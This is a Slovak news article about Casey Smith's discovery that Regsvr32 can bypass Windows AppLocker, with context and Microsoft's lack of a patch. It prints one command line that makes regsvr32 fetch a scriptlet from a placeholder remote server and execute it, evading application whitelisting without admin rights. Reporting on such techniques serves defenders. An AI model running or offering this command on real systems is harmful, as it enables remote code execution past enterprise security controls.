Výskumník z Colorada, ktorý sa volá menom Casey Smith, zistil, že program Regsvr32 možno použiť na obídenie aplikácie AppLocker v systéme Windows 10, a to je veľký problém pre používateľov počítačov, najmä tých, ktorí sa nachádzajú v podnikovom prostredí.

AppLocker bol prvýkrát predstavený vo Windows 7 a Windows Server 2008 R2. Je navrhnutý tak, aby umožnil správcom určiť, ktorá skupina alebo používatelia môžu využívať výhody niektorých alebo všetkých aplikácií na základe jedinečnej identity súborov. Ak ste osoba, ktorá má tendenciu používať AppLocker, potom by malo byť všeobecne známe, že sa dá použiť na vytvorenie určitých pravidiel, ktoré im umožnia spustiť alebo zastaviť aplikácie v ich stopách.

Pre tých, ktorí si možno neuvedomujú, sa Regvr32 môže použiť na registráciu a zrušenie registrácie DLL. Toto nie je nástroj na jedno kliknutie, pretože ide o obslužný program príkazového riadku, takže iba pokročilí používatelia počítačov by sa mali snažiť využiť to, čo ponúka.

Chápeme, že použitím tejto techniky to nemení register počítačového systému, čo sťažuje správcom vedieť, či boli vykonané nejaké zmeny.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

"Úžasná vec je, že regsvr32 je už na serveri proxy, používa TLS, sleduje presmerovania atď. … A … uhádli ste podpísaný predvolený binárny program MS." Všetko, čo musíte urobiť, je preto, aby ste hostili súbor your.sct na mieste, ktoré ovládate, “napísal Smith.

Vyššie uvedená technika nevyžaduje oprávnenia správcu a nemení to register. Skripty môžu byť naviac vyvolávané prostredníctvom protokolu HTTP alebo HTTPS. V súčasnosti spoločnosť Microsoft neuvoľnila opravu tohto malého problému, takže jedinou možnosťou v tomto bode je blokovanie programu Regsvr32 prostredníctvom brány Windows Firewall.

Je zaujímavé, že softvérový gigant ešte musí reagovať na tento problém zabezpečenia, ktorému čelí jeho operačný systém. Teraz, keď je otvorená, očakávame od spoločnosti niečo počuť spolu s hovormi o budúcej náplasti.